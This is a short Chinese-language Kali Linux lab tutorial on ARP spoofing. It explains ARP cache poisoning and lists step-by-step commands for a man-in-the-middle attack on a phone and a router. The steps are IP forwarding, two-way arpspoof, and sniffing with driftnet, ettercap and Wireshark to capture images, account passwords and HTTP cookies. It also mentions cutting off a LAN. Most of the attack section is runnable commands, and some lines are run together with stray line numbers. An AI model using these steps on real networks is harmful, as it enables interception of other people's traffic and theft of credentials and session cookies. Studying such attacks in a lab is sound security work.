Kali Linux ARP 攻击实验
准备
- Kali 2.0+
- 虚拟机网络设置为“桥接模式”bridged
原理
地址解析协议,即ARP(Address Resolution Protocol)
在网络的第二层,Mac和IP需要一个映射关系,才能让第一层的物理机的Mac和第三层的网络IP一一对应。ARP缓存就是来存放这个映射表的。设A机IP为ipA,Mac地址为macA,B机(路由器)的IP为ipB,Mac地址为macB,攻击者C机,ipc和macC。
将A机的ARP缓存中,ipB映射为macC,那么A机所有发出的报文都发给了C机。
同理B路由器的ARP缓存中,ipA映射为macC,那么B路由器发出的数据都给了C机。
这时C机再打开数据转发,那么不影响A与B的通讯,但是获得了数据。这是简单的中间人攻击。
使ARP混乱也能让局域网断网。
实验
手机(受害者)ip192.168.2.204
路由器ip192.168.2.1
攻击机 ip192.168.2.213
在Kali虚拟机 的终端A操作1234arp -a //查询ARP缓存情况ifconfig //查询网络参数system net.ipv4.ip_forward=1 //开启ipv4的IP转发arpspoof -t 192.168.2.204 -i eth0 -r -c own 192.168.2.1//双向欺骗
在其他终端你可以123drifnet //嗅探图片ettercap -Tq -i eth0 //嗅探帐号密码 http有效wireshark //抓包 分析工具
wireshark filter 可以输入 ip.src==192.168.2.1 and http 抓取cookie
断网攻击
|
|